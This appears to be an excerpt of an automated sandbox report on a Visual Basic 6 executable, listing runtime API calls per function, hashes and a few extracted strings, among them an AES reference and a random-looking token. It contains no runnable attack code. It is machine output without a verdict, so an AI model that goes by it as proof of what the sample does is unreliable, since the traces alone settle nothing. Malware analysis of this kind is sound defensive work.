                                                          • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000001), ref: 004246F7
                                                          • #570.MSVBVM60(00000001), ref: 00424706
                                                          • __vbaVarDup.MSVBVM60 ref: 00424723
                                                          • #606.MSVBVM60(?,?), ref: 00424731
                                                          • __vbaStrMove.MSVBVM60 ref: 0042473C
                                                          • __vbaStr2Vec.MSVBVM60(?,00000000), ref: 00424747
                                                          • __vbaAryMove.MSVBVM60(?,?), ref: 00424755
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042475E
                                                          • __vbaFreeVar.MSVBVM60 ref: 00424767
                                                          • __vbaGetOwner3.MSVBVM60(0040A444,?,00000001), ref: 0042477F
                                                          • __vbaFileClose.MSVBVM60(00000001), ref: 0042478E
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 004247A1
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042480E
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00424825
                                                          • __vbaStrUI1.MSVBVM60(00000000), ref: 00424841
                                                          • __vbaStrMove.MSVBVM60 ref: 0042484C
                                                          • __vbaStrCmp.MSVBVM60(0040796C,00000000), ref: 00424858
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042486C
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004248C5
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004248DC
                                                          • #608.MSVBVM60(?,00000000), ref: 004248FE
                                                          • __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 00424910
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00424917
                                                          • __vbaStrMove.MSVBVM60 ref: 00424922
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00424932
                                                          • __vbaStrCopy.MSVBVM60 ref: 00424954
                                                          • __vbaFreeStr.MSVBVM60(004249B3), ref: 004249A0
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004249AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$ErrorFreeMove$BoundsGenerate$File$#570#606#608ChkstkCloseCopyDestructListOpenOwner3Str2Ubound
                                                          • String ID:
                                                          • API String ID: 3136081494-0
                                                          • Opcode ID: ce773839476eb44e80e8b30e9664ddbbbbb194b8b5faa7f6cd6155d312b3fc31
                                                          • Instruction ID: 27b5a6cf581a68f32102f1097c0c9f5ab12dda25c652156dbf498cbea85f9006
                                                          • Opcode Fuzzy Hash: ce773839476eb44e80e8b30e9664ddbbbbb194b8b5faa7f6cd6155d312b3fc31
                                                          • Instruction Fuzzy Hash: 7D91E674E00218DFDB14DFA4DA88BDDBBB4FB48304F20816AE506B72A1DB745A85CF65
                                                          APIs
                                                            • Part of subcall function 00432090: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004320ED
                                                            • Part of subcall function 00432090: #632.MSVBVM60(?,?,00000000,?,?,?,00000000), ref: 00432131
                                                            • Part of subcall function 00432090: __vbaVarMove.MSVBVM60(?,?,00000000), ref: 00432140
                                                            • Part of subcall function 00432090: __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 00432149
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,00000000), ref: 00432169
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 00432189
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,00000000), ref: 004321A9
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321C9
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321E9
                                                          • #632.MSVBVM60(?,?,?,?,?,?,?,?,6D42D8B1), ref: 004316D6
                                                          • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,?,?,?,6D42D8B1), ref: 004316FB
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,?,?,?,6D42D8B1), ref: 00431711
                                                          • #632.MSVBVM60(?,00004008,?,00000002,?,?,6D42D8B1), ref: 00431768
                                                          • __vbaVarTstEq.MSVBVM60(00008008,?,?,00000002,?,?,6D42D8B1), ref: 0043178D
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,00000002,?,?,6D42D8B1), ref: 004317A3
                                                          • __vbaErrorOverflow.MSVBVM60(00431904,?,?,?,?,?,6D42D8B1), ref: 0043191B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$#632Free$List$BstrErrorMoveOverflow
                                                          • String ID: : $Invalid Boolean at position $false$true
                                                          • API String ID: 4277481792-1334132093
                                                          • Opcode ID: 118e29937d2f2c8318f4028fb20154315495309dcc491b82954b1f47b02b4543
                                                          • Instruction ID: 6e94324009c574fae37af947af28c3d2d5d841661daa388a78b32d593ddb6f74
                                                          • Opcode Fuzzy Hash: 118e29937d2f2c8318f4028fb20154315495309dcc491b82954b1f47b02b4543
                                                          • Instruction Fuzzy Hash: F781F5B1900219EFDB14DF94DD88AEEBBB8FF88304F14421EE145A7260DBB41A49CF65
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0043250E
                                                          • __vbaOnError.MSVBVM60(000000FF,00000000,?,00000001,00000000,004030D6), ref: 0043253E
                                                          • __vbaStr2Vec.MSVBVM60(?), ref: 00432555
                                                          • __vbaAryMove.MSVBVM60(?,?), ref: 00432563
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 00432576
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004325E0
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004325F1
                                                          • __vbaUI1I2.MSVBVM60 ref: 00432615
                                                          • __vbaUI1I2.MSVBVM60 ref: 00432629
                                                          • __vbaUI1I2.MSVBVM60 ref: 0043263D
                                                          • __vbaUI1I2.MSVBVM60 ref: 00432651
                                                          • __vbaUI1I2.MSVBVM60 ref: 00432663
                                                          • __vbaUI1I2.MSVBVM60 ref: 0043267B
                                                          • __vbaUI1I2.MSVBVM60 ref: 0043268D
                                                          • __vbaUI1I2.MSVBVM60 ref: 004326A5
                                                          • __vbaUI1I2.MSVBVM60 ref: 004326B5
                                                          • __vbaUI1I2.MSVBVM60 ref: 004326C7
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00432712
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00432723
                                                          • __vbaUI1I2.MSVBVM60 ref: 0043272E
                                                          • __vbaStrVarCopy.MSVBVM60(00002011,0040B44C,00000000,00000001,000000FF,00000000), ref: 00432771
                                                          • __vbaStrMove.MSVBVM60 ref: 0043277C
                                                          • #712.MSVBVM60(00000000), ref: 00432783
                                                          • __vbaStrMove.MSVBVM60 ref: 0043278E
                                                          • __vbaFreeStr.MSVBVM60 ref: 00432797
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,004327DA), ref: 004327D3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$BoundsGenerate$Move$#712ChkstkCopyDestructFreeStr2Ubound
                                                          • String ID:
                                                          • API String ID: 2409928056-0
                                                          • Opcode ID: 1084910ace5bef600d200f0fdd586eebee336a10b7b1f30b88a0caf7ca925222
                                                          • Instruction ID: f2c87915420c041b9cd31112f174744140c53ae4d996f20a6ece4dfcdb10a1e2
                                                          • Opcode Fuzzy Hash: 1084910ace5bef600d200f0fdd586eebee336a10b7b1f30b88a0caf7ca925222
                                                          • Instruction Fuzzy Hash: B3810974D01248DFDB14CFA8CA58BDDBBB1BF48300F14826AD552BB291CBB85985CF59
                                                          APIs
                                                          • __vbaUbound.MSVBVM60(00000001,?,004019D0,-00000001,6D4FEC2C), ref: 0041C17A
                                                          • __vbaUI1I2.MSVBVM60(?,004019D0,-00000001,6D4FEC2C), ref: 0041C182
                                                          • __vbaAryCopy.MSVBVM60(?,00401AA8,?,004019D0,-00000001,6D4FEC2C), ref: 0041C190
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,004019D0,-00000001,6D4FEC2C), ref: 0041C1BE
                                                          • __vbaVarMove.MSVBVM60(?,004019D0,-00000001,6D4FEC2C), ref: 0041C1F5
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,004019D0,-00000001,6D4FEC2C), ref: 0041C218
                                                          • __vbaVarMove.MSVBVM60(?,004019D0,-00000001,6D4FEC2C), ref: 0041C24F
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000,?,004019D0,-00000001,6D4FEC2C), ref: 0041C25B
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,?,00000000,?,004019D0,-00000001,6D4FEC2C), ref: 0041C26D
                                                          • __vbaUbound.MSVBVM60(00000001,00000000), ref: 0041C27B
                                                          • __vbaFreeVar.MSVBVM60(00000011,?,?,?,?), ref: 0041C2F0
                                                          • __vbaI4Var.MSVBVM60(?,00000004), ref: 0041C2F8
                                                          • __vbaFreeVar.MSVBVM60(0041C3EE), ref: 0041C3DA
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C3E2
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041C3EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$FreeUbound$BoundsErrorGenerateMove$CopyDestructRedim
                                                          • String ID:
                                                          • API String ID: 149760206-0
                                                          • Opcode ID: 3baccdda1d2809d46bde41a25fc8a952dccf70afff562d7b6d9ffcace4006ba5
                                                          • Instruction ID: f0e285f4063d10deed7c1c1aa1cdf9b5e6e788df8985767b1477617bc2fe476b
                                                          • Opcode Fuzzy Hash: 3baccdda1d2809d46bde41a25fc8a952dccf70afff562d7b6d9ffcace4006ba5
                                                          • Instruction Fuzzy Hash: 70814771D002189FDB14CFA4CE84BEDBBB9EF88300F10819AE549A7261D7B45A85CF65
                                                          APIs
                                                            • Part of subcall function 00432090: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004320ED
                                                            • Part of subcall function 00432090: #632.MSVBVM60(?,?,00000000,?,?,?,00000000), ref: 00432131
                                                            • Part of subcall function 00432090: __vbaVarMove.MSVBVM60(?,?,00000000), ref: 00432140
                                                            • Part of subcall function 00432090: __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 00432149
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,00000000), ref: 00432169
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 00432189
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,00000000), ref: 004321A9
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321C9
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321E9
                                                          • #632.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 00430BE3
                                                          • __vbaVarMove.MSVBVM60(?,?,?,?,?,00000000), ref: 00430BF2
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000), ref: 00430BFB
                                                          • __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,?,?,00000000), ref: 00430C20
                                                          • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,00000000), ref: 00430C5F
                                                          • __vbaVarSetObj.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00430C75
                                                          • __vbaFreeVar.MSVBVM60(00430E59,?,?,?,?,?,00000000), ref: 00430E52
                                                            • Part of subcall function 00430B60: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 004303EE
                                                            • Part of subcall function 00430B60: __vbaNew.MSVBVM60(00405678,?,00000000,?,00000000,004030D6), ref: 00430421
                                                            • Part of subcall function 00430B60: __vbaObjSet.MSVBVM60(00000000,00000000,?,00000000,?,00000000,004030D6), ref: 0043042C
                                                            • Part of subcall function 00430B60: #632.MSVBVM60(?,00004008,?,00000002), ref: 0043048A
                                                            • Part of subcall function 00430B60: __vbaVarTstNe.MSVBVM60(00008008,?), ref: 004304AF
                                                            • Part of subcall function 00430B60: __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 004304C6
                                                          Strings
                                                          • IKtURdOrQrJTUtVlROvWiJksPlxjRXfYF, xrefs: 00430D37
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$#632$Move$BstrChkstkList
                                                          • String ID: IKtURdOrQrJTUtVlROvWiJksPlxjRXfYF
                                                          • API String ID: 2645352053-2368175096
                                                          • Opcode ID: 2581f3fa900a6acd7c20e0f9bf1c55efdf7e9f461afda66f5801de3f617ee9ec
                                                          • Instruction ID: 00ae64f3a83a768669833b1904382921f5590d997e121e677bf95f2f209db79e
                                                          • Opcode Fuzzy Hash: 2581f3fa900a6acd7c20e0f9bf1c55efdf7e9f461afda66f5801de3f617ee9ec
                                                          • Instruction Fuzzy Hash: BB81F8B590020DAFDF10DFD4CA94AEEB7B8FF48704F50855AE049A7254DB786A09CF68
                                                          APIs
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004268DA
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004268F7
                                                          • __vbaChkstk.MSVBVM60(?), ref: 0042693C
                                                          • __vbaVarIndexLoad.MSVBVM60(?,?,00000001,?), ref: 00426970
                                                          • __vbaVarSub.MSVBVM60(?,00000000), ref: 00426981
                                                          • __vbaVarTstLt.MSVBVM60(00008002,00000000), ref: 0042698F
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042699F
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 004269F4
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426A11
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426A7D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426A9A
                                                          • __vbaVarAdd.MSVBVM60(?,00000002,?), ref: 00426ABE
                                                          • __vbaChkstk.MSVBVM60(00000000), ref: 00426ACA
                                                          • __vbaVarIndexLoad.MSVBVM60(?,?,00000001,00000000), ref: 00426B01
                                                          • __vbaVarSub.MSVBVM60(?,00000000), ref: 00426B12
                                                          • __vbaVarMove.MSVBVM60 ref: 00426B26
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00426B39
                                                          • __vbaChkstk.MSVBVM60(?), ref: 00426C37
                                                          • __vbaVarIndexLoad.MSVBVM60(?,?,00000001,?), ref: 00426C6B
                                                          • __vbaVarSub.MSVBVM60(?,00000000), ref: 00426C7C
                                                          • __vbaVarMove.MSVBVM60 ref: 00426C90
                                                          • __vbaFreeVar.MSVBVM60 ref: 00426C99
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426CF2
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 00426D0F
                                                          • __vbaI4Var.MSVBVM60(?), ref: 00426D28
                                                          • #608.MSVBVM60(?,00000000), ref: 00426D33
                                                          • __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 00426D4B
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 00426D52
                                                          • __vbaStrMove.MSVBVM60 ref: 00426D5D
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00426D70
                                                          • #712.MSVBVM60(?,0040A5D4,0040796C,00000001,000000FF,00000000), ref: 00426DA0
                                                          • __vbaStrMove.MSVBVM60 ref: 00426DAB
                                                          • __vbaFreeVar.MSVBVM60(00426E58), ref: 00426E0C
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00426E18
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00426E24
                                                          • __vbaAryDestruct.MSVBVM60(00000000,00000000), ref: 00426E30
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00426E3C
                                                          • __vbaFreeStr.MSVBVM60 ref: 00426E45
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00426E51
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00426E73
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$BoundsGenerate$Free$DestructMove$ChkstkIndexLoad$List$#608#712Overflow
                                                          • String ID: ?
                                                          • API String ID: 2601914315-1684325040
                                                          • Opcode ID: 60136c3ecd21dd9e1db791fc5e9bba66e31002cabf61c2bbf48c8e1ee5f85e0d
                                                          • Instruction ID: 0528d71923e38258377bfa1d05c1f1432efa54e83b06e1ccfe4f43acf83de86b
                                                          • Opcode Fuzzy Hash: 60136c3ecd21dd9e1db791fc5e9bba66e31002cabf61c2bbf48c8e1ee5f85e0d
                                                          • Instruction Fuzzy Hash: BCA116B0A00228DFDB18DF94D988BEEB7B5FF44304F10819AE50AA7250DB74AAC5CF45
                                                          APIs
                                                            • Part of subcall function 00431BC0: __vbaLenBstr.MSVBVM60(?,00402A88,?,?,00000000,00000000), ref: 00431C3C
                                                            • Part of subcall function 00431BC0: #632.MSVBVM60(?,?,00000000,?,?,00402A88,?,?,00000000,00000000), ref: 00431C80
                                                            • Part of subcall function 00431BC0: __vbaStrVarMove.MSVBVM60(?,?,00402A88,?,?,00000000,00000000), ref: 00431C8A
                                                            • Part of subcall function 00431BC0: __vbaStrMove.MSVBVM60(?,00402A88,?,?,00000000,00000000), ref: 00431C95
                                                            • Part of subcall function 00431BC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,00402A88,?,?,00000000,00000000), ref: 00431CA1
                                                            • Part of subcall function 00431BC0: __vbaStrCopy.MSVBVM60(?,00000000,00000000), ref: 00431CB3
                                                            • Part of subcall function 00431BC0: __vbaStrCmp.MSVBVM60(00409DD4,?), ref: 00431CCB
                                                          • __vbaStrMove.MSVBVM60(?,00000000,?,?,?,?,?,00000000,?,00000000,004030D6), ref: 00430896
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,00000000,?,00000000,004030D6), ref: 004308A5
                                                            • Part of subcall function 00430B60: #632.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 00430BE3
                                                            • Part of subcall function 00430B60: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000000), ref: 00430BF2
                                                            • Part of subcall function 00430B60: __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000), ref: 00430BFB
                                                            • Part of subcall function 00430B60: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,?,?,00000000), ref: 00430C20
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00405668,00000028), ref: 00430910
                                                          • __vbaFreeVar.MSVBVM60 ref: 0043092B
                                                          • #685.MSVBVM60 ref: 00430938
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00430943
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A9C4,0000001C), ref: 0043098E
                                                          • __vbaFreeObj.MSVBVM60 ref: 004309BE
                                                          • #685.MSVBVM60 ref: 004309DA
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004309E5
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A9C4,0000002C), ref: 00430A2D
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00430A50
                                                          • __vbaStrMove.MSVBVM60 ref: 00430A5B
                                                          • __vbaStrCat.MSVBVM60(004074EC,00000000), ref: 00430A67
                                                          • __vbaStrMove.MSVBVM60 ref: 00430A72
                                                          • __vbaStrCat.MSVBVM60(?,00000000), ref: 00430A7D
                                                          • __vbaStrMove.MSVBVM60 ref: 00430A88
                                                          • __vbaStrCat.MSVBVM60(00405824,00000000), ref: 00430A94
                                                          • __vbaStrMove.MSVBVM60 ref: 00430AA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$CheckHresult$#632#685$BstrCopyErrorList
                                                          • String ID:
                                                          • API String ID: 2070835150-0
                                                          • Opcode ID: 8ff5959f58b09f67fed506e0d12086244c97f7b5544da6ede9f829fa9f7b643f
                                                          • Instruction ID: 185329e081c2013b97245a50dd7e1eb17ebf67c8066c18f60764d50aac431cfd
                                                          • Opcode Fuzzy Hash: 8ff5959f58b09f67fed506e0d12086244c97f7b5544da6ede9f829fa9f7b643f
                                                          • Instruction Fuzzy Hash: BD61D875901218EFDB14DFA0DD58FDEB7B5BB48301F1086A9E60AB32A0DB345A85CF24
                                                          APIs
                                                          • __vbaOnError.MSVBVM60(000000FF), ref: 0043007E
                                                            • Part of subcall function 00430B60: #632.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 00430BE3
                                                            • Part of subcall function 00430B60: __vbaVarMove.MSVBVM60(?,?,?,?,?,00000000), ref: 00430BF2
                                                            • Part of subcall function 00430B60: __vbaFreeVar.MSVBVM60(?,?,?,?,?,00000000), ref: 00430BFB
                                                            • Part of subcall function 00430B60: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,?,?,00000000), ref: 00430C20
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B580,00000020), ref: 00430105
                                                          • __vbaFreeVarList.MSVBVM60(00000004,?,0000000A,0000000A,0000000A), ref: 0043012F
                                                          • #685.MSVBVM60 ref: 0043013F
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0043014A
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A9C4,0000001C), ref: 00430195
                                                          • __vbaFreeObj.MSVBVM60 ref: 004301C5
                                                          • #685.MSVBVM60 ref: 004301E1
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004301EC
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A9C4,0000002C), ref: 00430234
                                                          • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00430257
                                                          • __vbaStrMove.MSVBVM60 ref: 00430262
                                                          • __vbaStrCat.MSVBVM60(004074EC,00000000), ref: 0043026E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$CheckFreeHresult$#685Move$#632ErrorList
                                                          • String ID:
                                                          • API String ID: 1838273782-0
                                                          • Opcode ID: ff573a78c4137040f2519dd599cca3cc6dc9ac62e15350fc9f3a8d22924a19c2
                                                          • Instruction ID: 95dd7ef1d4007deae355760f07fd42b620220de7d86b697b5d6566f3d6d0504e
                                                          • Opcode Fuzzy Hash: ff573a78c4137040f2519dd599cca3cc6dc9ac62e15350fc9f3a8d22924a19c2
                                                          • Instruction Fuzzy Hash: A681E6B5900218EFDB14DFD0DD88BDEB7B9BB48300F10869AE50AB7150DB745A89CF64
                                                          APIs
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0000000B,00000000,?,00000000), ref: 0042C2B8
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0042C2CD
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0042C31C
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 0042C328
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-0000001F,?,00000000), ref: 0042C34C
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0042C35B
                                                            • Part of subcall function 0042ECB0: __vbaFreeVar.MSVBVM60 ref: 0042EFB5
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0042C3AA
                                                          • __vbaUbound.MSVBVM60(00000001,00000000,00000010,?,00000000,00000000), ref: 0042C3BD
                                                          • __vbaUbound.MSVBVM60(00000001,?,($@,-0000000F), ref: 0042C3D0
                                                            • Part of subcall function 0042C490: #644.MSVBVM60(AES,6D4245C1,00000000,($@), ref: 0042C4EA
                                                            • Part of subcall function 0042C490: __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 0042C501
                                                            • Part of subcall function 0042C490: __vbaStrCopy.MSVBVM60 ref: 0042C510
                                                            • Part of subcall function 0042C490: __vbaSetSystemError.MSVBVM60(?), ref: 0042C814
                                                            • Part of subcall function 0042C490: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0042C824
                                                            • Part of subcall function 0042C490: __vbaFreeStr.MSVBVM60(0042C84A), ref: 0042C843
                                                          • #717.MSVBVM60(00000003,?,00000040,00000000,0042C138,?,?,00000000,-00000001), ref: 0042C40B
                                                          • __vbaStrVarMove.MSVBVM60(00000003), ref: 0042C415
                                                          • __vbaStrMove.MSVBVM60 ref: 0042C420
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042C429
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042C46D,0042C138,?,?,00000000,-00000001), ref: 0042C45C
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042C463
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042C46A
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0042C483
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042EE3E
